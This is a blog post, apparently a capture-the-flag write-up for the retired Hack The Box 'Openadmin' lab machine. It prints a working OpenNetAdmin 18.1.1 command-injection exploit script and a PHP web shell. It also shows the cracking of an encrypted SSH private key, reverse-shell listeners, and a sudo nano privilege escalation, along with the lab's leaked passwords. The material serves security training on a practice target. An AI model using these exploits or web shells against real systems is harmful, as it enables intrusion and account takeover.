Posts Hackthebox Openadmin writeup
Post
Cancel

Hackthebox Openadmin writeup

Information@openadmin:~$

ColumnDetails
NameOpenadmin
IP10.10.10.171
Points20
OsLinux
DifficultyEasy
Creatordmw0ng
Out On4 Jan 2020
Retired on2 MAY 2020

Brief@openadmin:~$

Gobuster reveals a dir called music which has a OpenNetAdmin 18.1.1 running on it . There is a public exploit available for the version of the Openadmin-portl . And we got an initial shell as www-data.The database_settings.inc.phpfile contains the passowrd for the user jimmy.There are two ways to get shell as joanna one is after analyzing the local high port we can see the code in main.php to read the private keys for the user joanna and after making a request to the to that port/main.php we have encrypted keys for the user joanna and after cracking the keys using john we got passpharse of id_rsa. Second one is we have read and write permissions to the directory internal since the service is running as joanna so we make a .php file containing the php-code for rev shell and after making a request to our file we are joanna.And after logged in as joanna using ssh we can edit a file priv as root using nano . And after priv esc to using nano we are root.

Summary

  • Gobuster scan reveals the dir music
  • The /ona page reveals the version of openadmin-portal that is vulnerable to rce
  • Exploiting the portal to get an initial shell as www-data
  • The file database_settings.inc.php contains the password for user jimmy
  • Login as jimmy.
  • There is a hight port running locally which is serving the content of internal dir.
  • the file main.php have the code to read the private-ssh-keys of user joanna
  • And we can read and write permission to the dir internal
  • The first way to do it is making a request to /main.php which will give us encrypted id_rsa.
  • Use ssh2john to convert the id_rsa to john crackable hash
  • After that we got passpharse of id_rsa and logged in as joanna
  • The second way is make a executable file with rev-shell code in it.
  • Make a request to this file and you will get connection back on your listener .
  • Got user.txt
  • Sudo -l tells us that we can edit a file called /opt/priv as root using nano.
  • Executing commands in nano to get root shell.
  • Got root.txt

Pwned

For some really cool writeups follow my brother http://www.whatinfotech.com/

Recon

Nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
➜  openadmin nmap -sC -sV -T4 -oA scans/nmap.full -p- -v  openadmin.htb
# Nmap 7.80 scan initiated Fri May  1 11:44:03 2020 as: nmap -sC -sV -T4 -oA scans/nmap.full -p- -v  openadmin.htb
Failed to resolve "nmap.full".
Nmap scan report for openadmin.htb (10.10.10.171)
Host is up (0.27s latency).
Not shown: 65510 closed ports
PORT      STATE    SERVICE VERSION
22/tcp    open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
|   256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_  256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp    open     http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri May  1 11:55:17 2020 -- 1 IP address (1 host up) scanned in 673.78 seconds

Only two ports are opened 22:ssh and 80:http.So we just need to be focus on port 80

Port-80

port-80

The page has default apache page.

Gobuster results

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
➜  ~prashant gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -k   -x "txt,html,php,asp,aspx,jpg" -u http://openadmin.htb              
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://openadmin.htb
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     txt,html,php,asp,aspx,jpg
[+] Follow Redir:   true
[+] Timeout:        10s
===============================================================
2020/05/01 17:35:23 Starting gobuster
===============================================================
/index.html (Status: 200)
/music (Status: 200)
/artwork (Status: 200)

I got two directories music and artwork .

Music Dir

Music-dir

artwork dir

artwork

There is literally nothing on dir artwork.So i just switched to dir music now.

Exploiting openadmin portal

There is a login tab in on home page of Music Dir.Which is in /ona and there is a mention of the version of the portal.The title of the page is OpenNetadmin and the version is 18.1.1 if we look at the exploit-db there is a public exploit available for the current version.

Exploit

OpenNetadmin-Exploit

i just copy the exploit and modified it to a little extent

1
2
3
4
5
6
7
#!/bin/bash

URL="http://openadmin.htb/ona/"
while true;do
 echo -n "$ "; read cmd
 curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done

Just the variable URL

And now its time to run….

Got shell as www-data

1
2
3
4
5
6
➜  openadmin ./exploit.sh 
$ whoami
www-data
$ hostname
openadmin
$

After some manual enumeration i got a file called database_settings.inc.php in local/config

1
2
3
4
5
$ ls local/config
database_settings.inc.php
motd.txt.example
run_installer
$ 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ cat local/config/database_settings.inc.php
<?php

$ona_contexts=array (
  'DEFAULT' => 
  array (
    'databases' => 
    array (
      0 => 
      array (
        'db_type' => 'mysqli',
        'db_host' => 'localhost',
        'db_login' => 'ona_sys',
        'db_passwd' => 'n1nj4W4rri0R!',
        'db_database' => 'ona_default',
        'db_debug' => false,
      ),
    ),
    'description' => 'Default data context',
    'context_color' => '#D3DBFF',
  ),
);

We got a password here n1nj4W4rri0R!.Maybe its of any user .

There are two users in /home dir

1
2
3
4
5
6
7
$ ls -la /home
total 16
drwxr-xr-x  4 root   root   4096 Nov 22 18:00 .
drwxr-xr-x 24 root   root   4096 Nov 21 13:41 ..
drwxr-x---  5 jimmy  jimmy  4096 Nov 22 23:15 jimmy
drwxr-x---  6 joanna joanna 4096 Nov 28 09:37 joanna
$ 

I can confirm that the password is of user jimmy by logging in to ssh.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
➜  openadmin sshpass -p 'n1nj4W4rri0R!' ssh jimmy@openadmin.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri May  1 13:17:15 UTC 2020

  System load:  0.0               Processes:             124
  Usage of /:   49.9% of 7.81GB   Users logged in:       2
  Memory usage: 21%               IP address for ens160: 10.10.10.171
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

41 packages can be updated.
12 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Fri May  1 10:59:39 2020 from 10.10.16.81
jimmy@openadmin:~$ 

And i am jimmy now.

Privilege-escalation@joanna:~$

After various enumerations i got to know about a dir called internal in /var/www

And there is a high port 52846 running locally.

1
2
3
jimmy@openadmin:~$ ss -nlt
State              Recv-Q              Send-Q                            Local Address:Port                            Peer Address:Port                             
LISTEN             0                   128                                   127.0.0.1:52846                                0.0.0.0:*     

If we make a request to the 127.0.0.1:52846 using curl since it is already installed in.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
jimmy@openadmin:~$ curl 127.0.0.1:52846

<?
   // error_reporting(E_ALL);
   // ini_set("display_errors", 1);
?>

<html lang = "en">

   <head>
      <title>Tutorialspoint.com</title>
      <link href = "css/bootstrap.min.css" rel = "stylesheet">

      <style>
         body {
            padding-top: 40px;
            padding-bottom: 40px;
            background-color: #ADABAB;
         }

         .form-signin {
            max-width: 330px;
            padding: 15px;
            margin: 0 auto;
            color: #017572;
         }

         .form-signin .form-signin-heading,
         .form-signin .checkbox {
            margin-bottom: 10px;
         }

         .form-signin .checkbox {
            font-weight: normal;
         }

         .form-signin .form-control {
            position: relative;
            height: auto;
            -webkit-box-sizing: border-box;
            -moz-box-sizing: border-box;
            box-sizing: border-box;
            padding: 10px;
            font-size: 16px;
         }

         .form-signin .form-control:focus {
            z-index: 2;
         }

         .form-signin input[type="email"] {
            margin-bottom: -1px;
            border-bottom-right-radius: 0;
            border-bottom-left-radius: 0;
            border-color:#017572;
         }

         .form-signin input[type="password"] {
            margin-bottom: 10px;
            border-top-left-radius: 0;
            border-top-right-radius: 0;
            border-color:#017572;
         }

         h2{
            text-align: center;
            color: #017572;
         }
      </style>

   </head>
   <body>

      <h2>Enter Username and Password</h2>
      <div class = "container form-signin">
        <h2 class="featurette-heading">Login Restricted.<span class="text-muted"></span></h2>
                </div> <!-- /container -->

      <div class = "container">

         <form class = "form-signin" role = "form"
            action = "/index.php" method = "post">
            <h4 class = "form-signin-heading"></h4>
            <input type = "text" class = "form-control"
               name = "username"
               required autofocus></br>
            <input type = "password" class = "form-control"
               name = "password" required>
            <button class = "btn btn-lg btn-primary btn-block" type = "submit"
               name = "login">Login</button>
         </form>

      </div>

   </body>
</html>

The file that is being displayed and executed is /index.php from the dir /var/www/internal . First we need to find out that the service is running as which user ?

there are three files in the dir.

1
2
3
4
5
6
7
jimmy@openadmin:/var/www/internal$ ls -la
total 20
drwxrwx--- 2 jimmy internal 4096 May  1 13:26 .
drwxr-xr-x 4 root  root     4096 Nov 22 18:15 ..
-rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php
-rwxrwxr-x 1 jimmy internal  185 Nov 23 16:37 logout.php
-rwxrwxr-x 1 jimmy internal  339 Nov 23 17:40 main.php

I have r+w permissions in the dir internal so i can create .php that can execute commands as in cmd= param

1
<?php echo "<pre>"; system($_GET['cmd']); ?>
1
2
3
4
jimmy@openadmin:/var/www/internal$ echo '<?php echo "<pre>"; system($_GET['cmd']); ?>' >> test.php
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/test.php?cmd=whoami

<pre>joanna

And here we go , We just confirmed that the service is running as joanna

There are two ways to get a shell as joanna as far i did it.

1st method

By grabbing the id_rsa using main.php

the content of the file main.php is following

1
2
3
4
5
6
7
8
9
10
<?php session_start(); if (!isset ($_SESSION['username'])) { header("Location: /index.php"); }; 
# Open Admin Trusted
# OpenAdmin
$output = shell_exec('cat /home/joanna/.ssh/id_rsa');
echo "<pre>$output</pre>";
?>
<html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

Making a request to main.php.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/main.php
<pre>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,2AF25344B8391A25A9B318F3FD767D6D

kG0UYIcGyaxupjQqaS2e1HqbhwRLlNctW2HfJeaKUjWZH4usiD9AtTnIKVUOpZN8
ad/StMWJ+MkQ5MnAMJglQeUbRxcBP6++Hh251jMcg8ygYcx1UMD03ZjaRuwcf0YO
ShNbbx8Euvr2agjbF+ytimDyWhoJXU+UpTD58L+SIsZzal9U8f+Txhgq9K2KQHBE
6xaubNKhDJKs/6YJVEHtYyFbYSbtYt4lsoAyM8w+pTPVa3LRWnGykVR5g79b7lsJ
ZnEPK07fJk8JCdb0wPnLNy9LsyNxXRfV3tX4MRcjOXYZnG2Gv8KEIeIXzNiD5/Du
y8byJ/3I3/EsqHphIHgD3UfvHy9naXc/nLUup7s0+WAZ4AUx/MJnJV2nN8o69JyI
9z7V9E4q/aKCh/xpJmYLj7AmdVd4DlO0ByVdy0SJkRXFaAiSVNQJY8hRHzSS7+k4
piC96HnJU+Z8+1XbvzR93Wd3klRMO7EesIQ5KKNNU8PpT+0lv/dEVEppvIDE/8h/
/U1cPvX9Aci0EUys3naB6pVW8i/IY9B6Dx6W4JnnSUFsyhR63WNusk9QgvkiTikH
40ZNca5xHPij8hvUR2v5jGM/8bvr/7QtJFRCmMkYp7FMUB0sQ1NLhCjTTVAFN/AZ
fnWkJ5u+To0qzuPBWGpZsoZx5AbA4Xi00pqqekeLAli95mKKPecjUgpm+wsx8epb
9FtpP4aNR8LYlpKSDiiYzNiXEMQiJ9MSk9na10B5FFPsjr+yYEfMylPgogDpES80
X1VZ+N7S8ZP+7djB22vQ+/pUQap3PdXEpg3v6S4bfXkYKvFkcocqs8IivdK1+UFg
S33lgrCM4/ZjXYP2bpuE5v6dPq+hZvnmKkzcmT1C7YwK1XEyBan8flvIey/ur/4F
FnonsEl16TZvolSt9RH/19B7wfUHXXCyp9sG8iJGklZvteiJDG45A4eHhz8hxSzh
Th5w5guPynFv610HJ6wcNVz2MyJsmTyi8WuVxZs8wxrH9kEzXYD/GtPmcviGCexa
RTKYbgVn4WkJQYncyC0R1Gv3O8bEigX4SYKqIitMDnixjM6xU0URbnT1+8VdQH7Z
uhJVn1fzdRKZhWWlT+d+oqIiSrvd6nWhttoJrjrAQ7YWGAm2MBdGA/MxlYJ9FNDr
1kxuSODQNGtGnWZPieLvDkwotqZKzdOg7fimGRWiRv6yXo5ps3EJFuSU1fSCv2q2
XGdfc8ObLC7s3KZwkYjG82tjMZU+P5PifJh6N0PqpxUCxDqAfY+RzcTcM/SLhS79
yPzCZH8uWIrjaNaZmDSPC/z+bWWJKuu4Y1GCXCqkWvwuaGmYeEnXDOxGupUchkrM
+4R21WQ+eSaULd2PDzLClmYrplnpmbD7C7/ee6KDTl7JMdV25DM9a16JYOneRtMt
qlNgzj0Na4ZNMyRAHEl1SF8a72umGO2xLWebDoYf5VSSSZYtCNJdwt3lF7I8+adt
z0glMMmjR2L5c2HdlTUt5MgiY8+qkHlsL6M91c4diJoEXVh+8YpblAoogOHHBlQe
K1I1cqiDbVE/bmiERK+G4rqa0t7VQN6t2VWetWrGb+Ahw/iMKhpITWLWApA3k9EN
-----END RSA PRIVATE KEY-----
</pre><html>
<h3>Don't forget your "ninja" password</h3>
Click here to logout <a href="logout.php" tite = "Logout">Session
</html>

We got the encrypted private-ssh-keys.

Cracking the encrypted id_rsa using john

First we need to make a crackable hash of the encrypted id_rsa So john can crack it. I will be using ssh2john.py you can get it from Here

1
➜  openadmin python2 /usr/share/john/ssh2john.py joanna-id_rsa >> hash-id_rsa

Now its time for john to make some noice.

1
2
3
4
5
6
7
8
9
10
11
12
13
➜  openadmin john hash-id_rsa -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
bloodninjas      (joanna-id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:07 DONE (2020-05-01 20:14) 0.1371g/s 1967Kp/s 1967Kc/s 1967KC/sa6_123..*7¡Vamos!
Session completed

we got bloodninjas as the Cracked passpharse

Now its time to login using the key.

1
2
3
4
5
6
7
➜  openadmin chmod 600 joanna-id_rsa 
➜  openadmin ssh -i joanna-id_rsa joanna@openadmin.htb
Enter passphrase for key 'joanna-id_rsa': 
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-70-generic x86_64)

Last login: Fri May  1 11:31:30 2020 from 10.10.16.81
joanna@openadmin:~$ 

And i am in as joanna.

2nd method

By creating a new php file containing rev-shell

Now as the service is running as joanna and i have r+w permissions in the internal dir. SO we can simply create a .php file that will gives us connection back when we will make a request to it.

i made a 0xprashant.php with the following code.

1
2
3
4
5
<?php

                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           

?> 

And i make the request

1
jimmy@openadmin:/var/www/internal$ curl 127.0.0.1:52846/0xprashant.php

And on my netcat listener i got shell as joanna.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
➜  prashant nc -nlvp 1234
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:55726.
Linux openadmin 4.15.0-70-generic #79-Ubuntu SMP Tue Nov 12 10:36:11 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 14:00:00 up  8:44,  3 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
jimmy    pts/0    10.10.14.25      13:57    8.00s  0.05s  0.00s curl 127.0.0.1:52846/0xprashant.php
jimmy    pts/1    10.10.14.25      13:17   18:16   0.10s  0.10s -bash
joanna   pts/2    10.10.14.25      13:49    2:19   0.05s  0.05s -bash
uid=1001(joanna) gid=1001(joanna) groups=1001(joanna),1002(internal)
bash: cannot set terminal process group (1050): Inappropriate ioctl for device
bash: no job control in this shell
joanna@openadmin:/$ 

Got user.txt

1
2
3
joanna@openadmin:~$ cat user.txt
c9b-------------------------1b5f
joanna@openadmin:~$ 

Privilege-escalation@root:~$

After getting a full ssh shell as joanna. I run sudo -l to check if i may run any command as root.

1
2
3
4
5
6
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User joanna may run the following commands on openadmin:
    (ALL) NOPASSWD: /bin/nano /opt/priv

so i can edit the file /opt/priv using nano as root.

I searched for nano on Gtfobins

open the file /opt/priv in nano as root (sudo). Now press ctrl+r and then ctrl+x to run commands

The command that i will run will be a bash-rev-shell-cmd

1
joanna@openadmin:~$ sudo nano /opt/priv

and we are in nano and after running ctrl+r we are in file to insert

Nano

And now by just hitting a ctrl+x we are ready to execute a command

Nano

Hit enter and on our netcat listener we got a shell as root

1
2
3
4
5
6
7
➜  prashant nc -nlvp 2345 
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::2345
Ncat: Listening on 0.0.0.0:2345
Ncat: Connection from 10.10.10.171.
Ncat: Connection from 10.10.10.171:54498.
root@openadmin:~# 

Got root.txt

1
2
3
4
root@openadmin:/root# cat root.txt
cat root.txt
2f---------------------------b561
root@openadmin:/root# 

And we pwned it …….

If u liked the writeup.Support a Poor Student to Get the OSCP-Cert on BuymeaCoffee

If you want to get notified as soon as i upload something new to my blog So just click on the bell icon you are seeing on the right side – > and allow push notification

Resources

TopicUrl
OpenNetadmin-exploitClick-Here
Gtfobins-nanoClick-Here
Updated Jun 17, 2020 2020-06-17T07:03:57+00:00
This post is licensed under CC BY 4.0

© 2020 Prashant Saini. All rights reserved.